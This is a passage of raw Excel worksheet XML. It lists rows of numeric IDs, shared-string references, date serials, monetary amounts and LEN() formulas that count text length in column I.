      <c r="I1219" t="s">
        <v>10267</v>
      </c>
      <c r="K1219">
        <f>LEN(I1219)</f>
        <v>291</v>
      </c>
      <c r="L1219">
        <f>LEN(J1219)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1220" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1220">
        <v>19833</v>
      </c>
      <c r="B1220">
        <v>2617</v>
      </c>
      <c r="C1220" t="s">
        <v>5396</v>
      </c>
      <c r="D1220" t="s">
        <v>10265</v>
      </c>
      <c r="E1220">
        <v>12</v>
      </c>
      <c r="F1220" t="s">
        <v>9437</v>
      </c>
      <c r="G1220" s="1">
        <v>43936</v>
      </c>
      <c r="H1220">
        <v>10000</v>
      </c>
      <c r="I1220" t="s">
        <v>10267</v>
      </c>
      <c r="K1220">
        <f>LEN(I1220)</f>
        <v>291</v>
      </c>
      <c r="L1220">
        <f>LEN(J1220)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1221" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1221">
        <v>19586</v>
      </c>
      <c r="B1221">
        <v>2590</v>
      </c>
      <c r="C1221" t="s">
        <v>4375</v>
      </c>
      <c r="D1221" t="s">
        <v>10106</v>
      </c>
      <c r="E1221">
        <v>12</v>
      </c>
      <c r="F1221" t="s">
        <v>10112</v>
      </c>
      <c r="G1221" s="1">
        <v>43865</v>
      </c>
      <c r="H1221">
        <v>200000</v>
      </c>
      <c r="I1221" t="s">
        <v>10113</v>
      </c>
      <c r="K1221">
        <f>LEN(I1221)</f>
        <v>290</v>
      </c>
      <c r="L1221">
        <f>LEN(J1221)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1222" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1222">
        <v>19585</v>
      </c>
      <c r="B1222">
        <v>2590</v>
      </c>
      <c r="C1222" t="s">
        <v>4375</v>
      </c>
      <c r="D1222" t="s">
        <v>10106</v>
      </c>
      <c r="E1222">
        <v>12</v>
      </c>
      <c r="F1222" t="s">
        <v>10110</v>
      </c>
      <c r="G1222" s="1">
        <v>43865</v>
      </c>
      <c r="H1222">
        <v>150000</v>
      </c>
      <c r="I1222" t="s">
        <v>10111</v>
      </c>
      <c r="K1222">
        <f>LEN(I1222)</f>
        <v>278</v>
      </c>
      <c r="L1222">
        <f>LEN(J1222)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1223" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1223">
        <v>19587</v>
      </c>
      <c r="B1223">
        <v>2590</v>
      </c>
      <c r="C1223" t="s">
        <v>4375</v>
      </c>
      <c r="D1223" t="s">
        <v>10106</v>
      </c>
      <c r="E1223">
        <v>12</v>
      </c>
      <c r="F1223" t="s">
        <v>10114</v>
      </c>
      <c r="G1223" s="1">
        <v>43865</v>
      </c>
      <c r="H1223">
        <v>100000</v>
      </c>
      <c r="I1223" t="s">
        <v>10115</v>
      </c>
      <c r="K1223">
        <f>LEN(I1223)</f>
        <v>271</v>
      </c>
      <c r="L1223">
        <f>LEN(J1223)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1224" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1224">
        <v>20709</v>
      </c>
      <c r="B1224">
        <v>374</v>
      </c>
      <c r="C1224" t="s">
        <v>1035</v>
      </c>
      <c r="D1224" t="s">
        <v>10908</v>
      </c>
      <c r="E1224">
        <v>16</v>
      </c>
      <c r="F1224" t="s">
        <v>10909</v>
      </c>
      <c r="G1224" s="1">
        <v>43966</v>
      </c>
      <c r="H1224">
        <v>60000</v>
      </c>
      <c r="I1224" t="s">
        <v>10910</v>
      </c>
      <c r="K1224">
        <f>LEN(I1224)</f>
        <v>267</v>
      </c>
      <c r="L1224">
        <f>LEN(J1224)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1225" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1225">
        <v>19588</v>
      </c>
      <c r="B1225">
        <v>2590</v>
      </c>
      <c r="C1225" t="s">
        <v>4375</v>
      </c>
      <c r="D1225" t="s">
        <v>10106</v>
      </c>
      <c r="E1225">
        <v>12</v>
      </c>
      <c r="F1225" t="s">
        <v>10116</v>
      </c>
      <c r="G1225" s="1">
        <v>43865</v>
      </c>
      <c r="H1225">
        <v>100000</v>
      </c>
      <c r="I1225" t="s">
        <v>10117</v>
      </c>
      <c r="K1225">
        <f>LEN(I1225)</f>
        <v>260</v>
      </c>
      <c r="L1225">
        <f>LEN(J1225)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1226" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1226">
        <v>19319</v>
      </c>
      <c r="B1226">
        <v>2533</v>
      </c>
      <c r="C1226" t="s">
        <v>4921</v>
      </c>
      <c r="D1226" t="s">
        <v>9918</v>
      </c>
      <c r="E1226">
        <v>16</v>
      </c>
      <c r="F1226" t="s">
        <v>9437</v>
      </c>
      <c r="G1226" s="1">
        <v>43875</v>
      </c>
      <c r="H1226">
        <v>500</v>
      </c>
      <c r="I1226" t="s">
        <v>9923</v>
      </c>
      <c r="K1226">
        <f>LEN(I1226)</f>
        <v>255</v>
      </c>
      <c r="L1226">
        <f>LEN(J1226)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1227" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1227">
        <v>19318</v>
      </c>
      <c r="B1227">
        <v>2533</v>
      </c>
      <c r="C1227" t="s">
        <v>4921</v>
      </c>
      <c r="D1227" t="s">
        <v>9918</v>
      </c>
      <c r="E1227">
        <v>16</v>
      </c>
      <c r="F1227" t="s">
        <v>9921</v>
      </c>
      <c r="G1227" s="1">
        <v>43875</v>
      </c>
      <c r="H1227">
        <v>100</v>
      </c>
      <c r="I1227" t="s">
        <v>9922</v>
      </c>
      <c r="K1227">
        <f>LEN(I1227)</f>
        <v>237</v>
      </c>
      <c r="L1227">
        <f>LEN(J1227)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1228" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1228">
        <v>19317</v>
      </c>
      <c r="B1228">
        <v>2533</v>
      </c>
      <c r="C1228" t="s">
        <v>4921</v>
      </c>
      <c r="D1228" t="s">
        <v>9918</v>
      </c>
      <c r="E1228">
        <v>16</v>
      </c>
      <c r="F1228" t="s">
        <v>9919</v>
      </c>
      <c r="G1228" s="1">
        <v>43875</v>
      </c>
      <c r="H1228">
        <v>10000</v>
      </c>
      <c r="I1228" t="s">
        <v>9920</v>
      </c>
      <c r="K1228">
        <f>LEN(I1228)</f>
        <v>235</v>
      </c>
      <c r="L1228">
        <f>LEN(J1228)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1229" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1229">
        <v>19426</v>
      </c>
      <c r="B1229">
        <v>358</v>
      </c>
      <c r="C1229" t="s">
        <v>401</v>
      </c>
      <c r="D1229" t="s">
        <v>10027</v>
      </c>
      <c r="E1229">
        <v>12</v>
      </c>
      <c r="F1229" t="s">
        <v>10028</v>
      </c>
      <c r="G1229" s="1">
        <v>43917</v>
      </c>
      <c r="H1229">
        <v>0</v>
      </c>
      <c r="I1229" t="s">
        <v>10029</v>
      </c>
      <c r="K1229">
        <f>LEN(I1229)</f>
        <v>233</v>
      </c>
      <c r="L1229">
        <f>LEN(J1229)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1230" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1230">
        <v>20457</v>
      </c>
      <c r="B1230">
        <v>2082</v>
      </c>
      <c r="C1230" t="s">
        <v>5801</v>
      </c>
      <c r="D1230" t="s">
        <v>10731</v>
      </c>
      <c r="E1230">
        <v>13</v>
      </c>
      <c r="F1230" t="s">
        <v>2924</v>
      </c>
      <c r="G1230" s="1">
        <v>44123</v>
      </c>
      <c r="H1230">
        <v>730</v>
      </c>
      <c r="I1230" t="s">
        <v>10029</v>
      </c>
      <c r="K1230">
        <f>LEN(I1230)</f>
        <v>233</v>
      </c>
      <c r="L1230">
        <f>LEN(J1230)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1231" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1231">
        <v>20460</v>
      </c>
      <c r="B1231">
        <v>2082</v>
      </c>
      <c r="C1231" t="s">
        <v>5801</v>
      </c>
      <c r="D1231" t="s">
        <v>10731</v>
      </c>
      <c r="E1231">
        <v>13</v>
      </c>
      <c r="F1231" t="s">
        <v>9438</v>
      </c>
      <c r="G1231" s="1">
        <v>44123</v>
      </c>
      <c r="H1231">
        <v>35</v>
      </c>
      <c r="I1231" t="s">
        <v>10029</v>
      </c>
      <c r="K1231">
        <f>LEN(I1231)</f>
        <v>233</v>
      </c>
      <c r="L1231">
        <f>LEN(J1231)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1232" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1232">
        <v>20461</v>
      </c>
      <c r="B1232">
        <v>2082</v>
      </c>
      <c r="C1232" t="s">
        <v>5801</v>
      </c>
      <c r="D1232" t="s">
        <v>10731</v>
      </c>
      <c r="E1232">
        <v>13</v>
      </c>
      <c r="F1232" t="s">
        <v>10736</v>
      </c>
      <c r="G1232" s="1">
        <v>44123</v>
      </c>
      <c r="H1232">
        <v>5</v>
      </c>
      <c r="I1232" t="s">
        <v>10029</v>
      </c>
      <c r="K1232">
        <f>LEN(I1232)</f>
        <v>233</v>
      </c>
      <c r="L1232">
        <f>LEN(J1232)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1233" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1233">
        <v>20462</v>
      </c>
      <c r="B1233">
        <v>2082</v>
      </c>
      <c r="C1233" t="s">
        <v>5801</v>
      </c>
      <c r="D1233" t="s">
        <v>10731</v>
      </c>
      <c r="E1233">
        <v>13</v>
      </c>
      <c r="F1233" t="s">
        <v>10737</v>
      </c>
      <c r="G1233" s="1">
        <v>44123</v>
      </c>
      <c r="H1233">
        <v>10</v>
      </c>
      <c r="I1233" t="s">
        <v>10029</v>
      </c>
      <c r="K1233">
        <f>LEN(I1233)</f>
        <v>233</v>
      </c>
      <c r="L1233">
        <f>LEN(J1233)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1234" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1234">
        <v>20458</v>
      </c>
      <c r="B1234">
        <v>2082</v>
      </c>
      <c r="C1234" t="s">
        <v>5801</v>
      </c>
      <c r="D1234" t="s">
        <v>10731</v>
      </c>
      <c r="E1234">
        <v>13</v>
      </c>
      <c r="F1234" t="s">
        <v>10732</v>
      </c>
      <c r="G1234" s="1">
        <v>44123</v>
      </c>
      <c r="H1234">
        <v>50</v>
      </c>
      <c r="I1234" t="s">
        <v>10733</v>
      </c>
      <c r="K1234">
        <f>LEN(I1234)</f>
        <v>221</v>
      </c>
      <c r="L1234">
        <f>LEN(J1234)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1235" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1235">
        <v>20379</v>
      </c>
      <c r="B1235">
        <v>593</v>
      </c>
      <c r="C1235" t="s">
        <v>975</v>
      </c>
      <c r="D1235" t="s">
        <v>10669</v>
      </c>
      <c r="E1235">
        <v>16</v>
      </c>
      <c r="F1235" t="s">
        <v>10670</v>
      </c>
      <c r="G1235" s="1">
        <v>44000</v>
      </c>
      <c r="H1235">
        <v>900000</v>
      </c>
      <c r="I1235" t="s">
        <v>10671</v>
      </c>
      <c r="K1235">
        <f>LEN(I1235)</f>
        <v>220</v>
      </c>
      <c r="L1235">
        <f>LEN(J1235)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1236" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1236">
        <v>21233</v>
      </c>
      <c r="B1236">
        <v>2245</v>
      </c>
      <c r="C1236" t="s">
        <v>6132</v>
      </c>
      <c r="D1236" t="s">
        <v>9434</v>
      </c>
      <c r="E1236">
        <v>11</v>
      </c>
      <c r="F1236" t="s">
        <v>11227</v>
      </c>
      <c r="G1236" s="1">
        <v>44015</v>
      </c>
      <c r="H1236">
        <v>300000</v>
      </c>
      <c r="I1236" t="s">
        <v>11228</v>
      </c>
      <c r="K1236">
        <f>LEN(I1236)</f>
        <v>212</v>
      </c>
      <c r="L1236">
        <f>LEN(J1236)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1237" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1237">
        <v>19495</v>
      </c>
      <c r="B1237">
        <v>2528</v>
      </c>
      <c r="C1237" t="s">
        <v>5079</v>
      </c>
      <c r="D1237" t="s">
        <v>10081</v>
      </c>
      <c r="E1237">
        <v>10</v>
      </c>
      <c r="F1237" t="s">
        <v>9561</v>
      </c>
      <c r="G1237" s="1">
        <v>43889</v>
      </c>
      <c r="H1237">
        <v>100000</v>
      </c>
      <c r="I1237" t="s">
        <v>10085</v>
      </c>
      <c r="K1237">
        <f>LEN(I1237)</f>
        <v>210</v>
      </c>
      <c r="L1237">
        <f>LEN(J1237)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1238" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1238">
        <v>20459</v>
      </c>
      <c r="B1238">
        <v>2082</v>
      </c>
      <c r="C1238" t="s">
        <v>5801</v>
      </c>
      <c r="D1238" t="s">
        <v>10731</v>
      </c>
      <c r="E1238">
        <v>13</v>
      </c>
      <c r="F1238" t="s">
        <v>10734</v>
      </c>
      <c r="G1238" s="1">
        <v>44123</v>
      </c>
      <c r="H1238">
        <v>20</v>
      </c>
      <c r="I1238" t="s">
        <v>10735</v>
      </c>
      <c r="K1238">
        <f>LEN(I1238)</f>
        <v>209</v>
      </c>
      <c r="L1238">
        <f>LEN(J1238)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1239" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1239">
        <v>21320</v>
      </c>
      <c r="B1239">
        <v>4771</v>
      </c>
      <c r="C1239" t="s">
        <v>7139</v>
      </c>
      <c r="D1239" t="s">
        <v>11233</v>
      </c>
      <c r="E1239">
        <v>11</v>
      </c>
      <c r="F1239" t="s">
        <v>945</v>
      </c>
      <c r="G1239" s="1">
        <v>44102</v>
      </c>
      <c r="H1239">
        <v>500000</v>
      </c>
      <c r="I1239" t="s">
        <v>11302</v>
      </c>
      <c r="K1239">
        <f>LEN(I1239)</f>
        <v>209</v>
      </c>
      <c r="L1239">
        <f>LEN(J1239)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1240" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1240">
        <v>21386</v>
      </c>
      <c r="B1240">
        <v>4782</v>
      </c>
      <c r="C1240" t="s">
        <v>7163</v>
      </c>
      <c r="D1240" t="s">
        <v>11354</v>
      </c>
      <c r="E1240">
        <v>15</v>
      </c>
      <c r="F1240" t="s">
        <v>275</v>
      </c>
      <c r="G1240" s="1">
        <v>44071</v>
      </c>
      <c r="H1240">
        <v>4800</v>
      </c>
      <c r="I1240" t="s">
        <v>11357</v>
      </c>
      <c r="K1240">
        <f>LEN(I1240)</f>
        <v>204</v>
      </c>
      <c r="L1240">
        <f>LEN(J1240)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1241" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1241">
        <v>21378</v>
      </c>
      <c r="B1241">
        <v>622</v>
      </c>
      <c r="C1241" t="s">
        <v>1634</v>
      </c>
      <c r="D1241" t="s">
        <v>11343</v>
      </c>
      <c r="E1241">
        <v>12</v>
      </c>
      <c r="F1241" t="s">
        <v>11344</v>
      </c>
      <c r="G1241" s="1">
        <v>44081</v>
      </c>
      <c r="H1241">
        <v>128270</v>
      </c>
      <c r="I1241" t="s">
        <v>11345</v>
      </c>
      <c r="K1241">
        <f>LEN(I1241)</f>
        <v>186</v>
      </c>
      <c r="L1241">
        <f>LEN(J1241)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1242" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1242">
        <v>21232</v>
      </c>
      <c r="B1242">
        <v>2245</v>
      </c>
      <c r="C1242" t="s">
        <v>6132</v>
      </c>
      <c r="D1242" t="s">
        <v>9434</v>
      </c>
      <c r="E1242">
        <v>11</v>
      </c>
      <c r="F1242" t="s">
        <v>8913</v>
      </c>
      <c r="G1242" s="1">
        <v>44015</v>
      </c>
      <c r="H1242">
        <v>300000</v>
      </c>
      <c r="I1242" t="s">
        <v>11226</v>
      </c>
      <c r="K1242">
        <f>LEN(I1242)</f>
        <v>178</v>
      </c>
      <c r="L1242">
        <f>LEN(J1242)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1243" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1243">
        <v>21193</v>
      </c>
      <c r="B1243">
        <v>2361</v>
      </c>
      <c r="C1243" t="s">
        <v>4926</v>
      </c>
      <c r="D1243" t="s">
        <v>11164</v>
      </c>
      <c r="E1243">
        <v>16</v>
      </c>
      <c r="F1243" t="s">
        <v>11199</v>
      </c>
      <c r="G1243" s="1">
        <v>44071</v>
      </c>
      <c r="H1243">
        <v>50000</v>
      </c>
      <c r="I1243" t="s">
        <v>11200</v>
      </c>
      <c r="K1243">
        <f>LEN(I1243)</f>
        <v>175</v>
      </c>
      <c r="L1243">
        <f>LEN(J1243)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1244" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1244">
        <v>19903</v>
      </c>
      <c r="B1244">
        <v>462</v>
      </c>
      <c r="C1244" t="s">
        <v>554</v>
      </c>
      <c r="D1244" t="s">
        <v>10314</v>
      </c>
      <c r="E1244">
        <v>13</v>
      </c>
      <c r="F1244" t="s">
        <v>10315</v>
      </c>
      <c r="G1244" s="1">
        <v>44053</v>
      </c>
      <c r="H1244">
        <v>100000</v>
      </c>
      <c r="I1244" t="s">
        <v>10316</v>
      </c>
      <c r="K1244">
        <f>LEN(I1244)</f>
        <v>174</v>
      </c>
      <c r="L1244">
        <f>LEN(J1244)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1245" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1245">
        <v>19475</v>
      </c>
      <c r="B1245">
        <v>1344</v>
      </c>
      <c r="C1245" t="s">
        <v>2683</v>
      </c>
      <c r="D1245" t="s">
        <v>10070</v>
      </c>
      <c r="E1245">
        <v>16</v>
      </c>
      <c r="F1245" t="s">
        <v>9459</v>
      </c>
      <c r="G1245" s="1">
        <v>43922</v>
      </c>
      <c r="H1245">
        <v>30000</v>
      </c>
      <c r="I1245" t="s">
        <v>10073</v>
      </c>
      <c r="K1245">
        <f>LEN(I1245)</f>
        <v>173</v>
      </c>
      <c r="L1245">
        <f>LEN(J1245)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1246" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1246">
        <v>19476</v>
      </c>
      <c r="B1246">
        <v>1344</v>
      </c>
      <c r="C1246" t="s">
        <v>2683</v>
      </c>
      <c r="D1246" t="s">
        <v>10070</v>
      </c>
      <c r="E1246">
        <v>16</v>
      </c>
      <c r="F1246" t="s">
        <v>3204</v>
      </c>
      <c r="G1246" s="1">
        <v>43922</v>
      </c>
      <c r="H1246">
        <v>3000</v>
      </c>
      <c r="I1246" t="s">
        <v>10073</v>
      </c>
      <c r="K1246">
        <f>LEN(I1246)</f>
        <v>173</v>
      </c>
      <c r="L1246">
        <f>LEN(J1246)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1247" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1247">
        <v>20563</v>
      </c>
      <c r="B1247">
        <v>1714</v>
      </c>
      <c r="C1247" t="s">
        <v>2975</v>
      </c>
      <c r="D1247" t="s">
        <v>10811</v>
      </c>
      <c r="E1247">
        <v>13</v>
      </c>
      <c r="F1247" t="s">
        <v>8230</v>
      </c>
      <c r="G1247" s="1">
        <v>44186</v>
      </c>
      <c r="H1247">
        <v>7800</v>
      </c>
      <c r="I1247" t="s">
        <v>10812</v>
      </c>
      <c r="K1247">
        <f>LEN(I1247)</f>
        <v>171</v>
      </c>
      <c r="L1247">
        <f>LEN(J1247)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1248" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1248">
        <v>21387</v>
      </c>
      <c r="B1248">
        <v>4782</v>
      </c>
      <c r="C1248" t="s">
        <v>7163</v>
      </c>
      <c r="D1248" t="s">
        <v>11354</v>
      </c>
      <c r="E1248">
        <v>15</v>
      </c>
      <c r="F1248" t="s">
        <v>11358</v>
      </c>
      <c r="G1248" s="1">
        <v>44071</v>
      </c>
      <c r="H1248">
        <v>4800</v>
      </c>
      <c r="I1248" t="s">
        <v>11359</v>
      </c>
      <c r="K1248">
        <f>LEN(I1248)</f>
        <v>171</v>
      </c>
      <c r="L1248">
        <f>LEN(J1248)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1249" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1249">
        <v>19590</v>
      </c>
      <c r="B1249">
        <v>2590</v>
      </c>
      <c r="C1249" t="s">
        <v>4375</v>
      </c>
      <c r="D1249" t="s">
        <v>10106</v>
      </c>
      <c r="E1249">
        <v>12</v>
      </c>
      <c r="F1249" t="s">
        <v>9497</v>
      </c>
      <c r="G1249" s="1">
        <v>43865</v>
      </c>
      <c r="H1249">
        <v>100000</v>
      </c>
      <c r="I1249" t="s">
        <v>10119</v>
      </c>
      <c r="K1249">
        <f>LEN(I1249)</f>
        <v>170</v>
      </c>
      <c r="L1249">
        <f>LEN(J1249)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1250" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1250">
        <v>17303</v>
      </c>
      <c r="B1250">
        <v>2142</v>
      </c>
      <c r="C1250" t="s">
        <v>4977</v>
      </c>
      <c r="D1250" t="s">
        <v>9763</v>
      </c>
      <c r="E1250">
        <v>11</v>
      </c>
      <c r="F1250" t="s">
        <v>9469</v>
      </c>
      <c r="G1250" s="1">
        <v>43853</v>
      </c>
      <c r="H1250">
        <v>15000</v>
      </c>
      <c r="I1250" t="s">
        <v>9766</v>
      </c>
      <c r="K1250">
        <f>LEN(I1250)</f>
        <v>168</v>
      </c>
      <c r="L1250">
        <f>LEN(J1250)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1251" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1251">
        <v>19474</v>
      </c>
      <c r="B1251">
        <v>1344</v>
      </c>
      <c r="C1251" t="s">
        <v>2683</v>
      </c>
      <c r="D1251" t="s">
        <v>10070</v>
      </c>
      <c r="E1251">
        <v>16</v>
      </c>
      <c r="F1251" t="s">
        <v>10071</v>
      </c>
      <c r="G1251" s="1">
        <v>43922</v>
      </c>
      <c r="H1251">
        <v>3000</v>
      </c>
      <c r="I1251" t="s">
        <v>10072</v>
      </c>
      <c r="K1251">
        <f>LEN(I1251)</f>
        <v>168</v>
      </c>
      <c r="L1251">
        <f>LEN(J1251)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1252" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1252">
        <v>19479</v>
      </c>
      <c r="B1252">
        <v>1344</v>
      </c>
      <c r="C1252" t="s">
        <v>2683</v>
      </c>
      <c r="D1252" t="s">
        <v>10070</v>
      </c>
      <c r="E1252">
        <v>16</v>
      </c>
      <c r="F1252" t="s">
        <v>7564</v>
      </c>
      <c r="G1252" s="1">
        <v>43922</v>
      </c>
      <c r="H1252">
        <v>10000</v>
      </c>
      <c r="I1252" t="s">
        <v>10072</v>
      </c>
      <c r="K1252">
        <f>LEN(I1252)</f>
        <v>168</v>
      </c>
      <c r="L1252">
        <f>LEN(J1252)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1253" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1253">
        <v>20452</v>
      </c>
      <c r="B1253">
        <v>2760</v>
      </c>
      <c r="C1253" t="s">
        <v>6907</v>
      </c>
      <c r="D1253" t="s">
        <v>10728</v>
      </c>
      <c r="E1253">
        <v>16</v>
      </c>
      <c r="F1253" t="s">
        <v>10097</v>
      </c>
      <c r="G1253" s="1">
        <v>44050</v>
      </c>
      <c r="H1253">
        <v>90000</v>
      </c>
      <c r="I1253" t="s">
        <v>10729</v>
      </c>
      <c r="K1253">
        <f>LEN(I1253)</f>
        <v>164</v>
      </c>
      <c r="L1253">
        <f>LEN(J1253)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1254" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1254">
        <v>19807</v>
      </c>
      <c r="B1254">
        <v>2521</v>
      </c>
      <c r="C1254" t="s">
        <v>5362</v>
      </c>
      <c r="D1254" t="s">
        <v>10253</v>
      </c>
      <c r="E1254">
        <v>11</v>
      </c>
      <c r="F1254" t="s">
        <v>10256</v>
      </c>
      <c r="G1254" s="1">
        <v>43888</v>
      </c>
      <c r="H1254">
        <v>600</v>
      </c>
      <c r="I1254" t="s">
        <v>10257</v>
      </c>
      <c r="K1254">
        <f>LEN(I1254)</f>
        <v>161</v>
      </c>
      <c r="L1254">
        <f>LEN(J1254)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1255" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1255">
        <v>20564</v>
      </c>
      <c r="B1255">
        <v>1714</v>
      </c>
      <c r="C1255" t="s">
        <v>2975</v>
      </c>
      <c r="D1255" t="s">
        <v>10811</v>
      </c>
      <c r="E1255">
        <v>13</v>
      </c>
      <c r="F1255" t="s">
        <v>10813</v>
      </c>
      <c r="G1255" s="1">
        <v>44186</v>
      </c>
      <c r="H1255">
        <v>7800</v>
      </c>
      <c r="I1255" t="s">
        <v>10814</v>
      </c>
      <c r="K1255">
        <f>LEN(I1255)</f>
        <v>161</v>
      </c>
      <c r="L1255">
        <f>LEN(J1255)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1256" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1256">
        <v>21382</v>
      </c>
      <c r="B1256">
        <v>2205</v>
      </c>
      <c r="C1256" t="s">
        <v>5834</v>
      </c>
      <c r="D1256" t="s">
        <v>10691</v>
      </c>
      <c r="E1256">
        <v>14</v>
      </c>
      <c r="F1256" t="s">
        <v>11351</v>
      </c>
      <c r="G1256" s="1">
        <v>44070</v>
      </c>
      <c r="H1256">
        <v>288</v>
      </c>
      <c r="I1256" t="s">
        <v>11352</v>
      </c>
      <c r="K1256">
        <f>LEN(I1256)</f>
        <v>161</v>
      </c>
      <c r="L1256">
        <f>LEN(J1256)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1257" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1257">
        <v>21384</v>
      </c>
      <c r="B1257">
        <v>4782</v>
      </c>
      <c r="C1257" t="s">
        <v>7163</v>
      </c>
      <c r="D1257" t="s">
        <v>11354</v>
      </c>
      <c r="E1257">
        <v>15</v>
      </c>
      <c r="F1257" t="s">
        <v>11051</v>
      </c>
      <c r="G1257" s="1">
        <v>44071</v>
      </c>
      <c r="H1257">
        <v>4800</v>
      </c>
      <c r="I1257" t="s">
        <v>11355</v>
      </c>
      <c r="K1257">
        <f>LEN(I1257)</f>
        <v>161</v>
      </c>
      <c r="L1257">
        <f>LEN(J1257)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1258" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1258">
        <v>21385</v>
      </c>
      <c r="B1258">
        <v>4782</v>
      </c>
      <c r="C1258" t="s">
        <v>7163</v>
      </c>
      <c r="D1258" t="s">
        <v>11354</v>
      </c>
      <c r="E1258">
        <v>15</v>
      </c>
      <c r="F1258" t="s">
        <v>11356</v>
      </c>
      <c r="G1258" s="1">
        <v>44071</v>
      </c>
      <c r="H1258">
        <v>4800</v>
      </c>
      <c r="I1258" t="s">
        <v>11355</v>
      </c>
      <c r="K1258">
        <f>LEN(I1258)</f>
        <v>161</v>
      </c>
      <c r="L1258">
        <f>LEN(J1258)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1259" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1259">
        <v>19493</v>
      </c>
      <c r="B1259">
        <v>2528</v>
      </c>
      <c r="C1259" t="s">
        <v>5079</v>
      </c>
      <c r="D1259" t="s">
        <v>10081</v>
      </c>
      <c r="E1259">
        <v>10</v>
      </c>
      <c r="F1259" t="s">
        <v>10082</v>
      </c>
      <c r="G1259" s="1">
        <v>43889</v>
      </c>
      <c r="H1259">
        <v>300000</v>
      </c>
      <c r="I1259" t="s">
        <v>10083</v>
      </c>
      <c r="K1259">
        <f>LEN(I1259)</f>
        <v>159</v>
      </c>
      <c r="L1259">
        <f>LEN(J1259)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1260" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1260">
        <v>19494</v>
      </c>
      <c r="B1260">
        <v>2528</v>
      </c>
      <c r="C1260" t="s">
        <v>5079</v>
      </c>
      <c r="D1260" t="s">
        <v>10081</v>
      </c>
      <c r="E1260">
        <v>10</v>
      </c>
      <c r="F1260" t="s">
        <v>9586</v>
      </c>
      <c r="G1260" s="1">
        <v>43889</v>
      </c>
      <c r="H1260">
        <v>300000</v>
      </c>
      <c r="I1260" t="s">
        <v>10084</v>
      </c>
      <c r="K1260">
        <f>LEN(I1260)</f>
        <v>159</v>
      </c>
      <c r="L1260">
        <f>LEN(J1260)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1261" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1261">
        <v>21321</v>
      </c>
      <c r="B1261">
        <v>4771</v>
      </c>
      <c r="C1261" t="s">
        <v>7139</v>
      </c>
      <c r="D1261" t="s">
        <v>11233</v>
      </c>
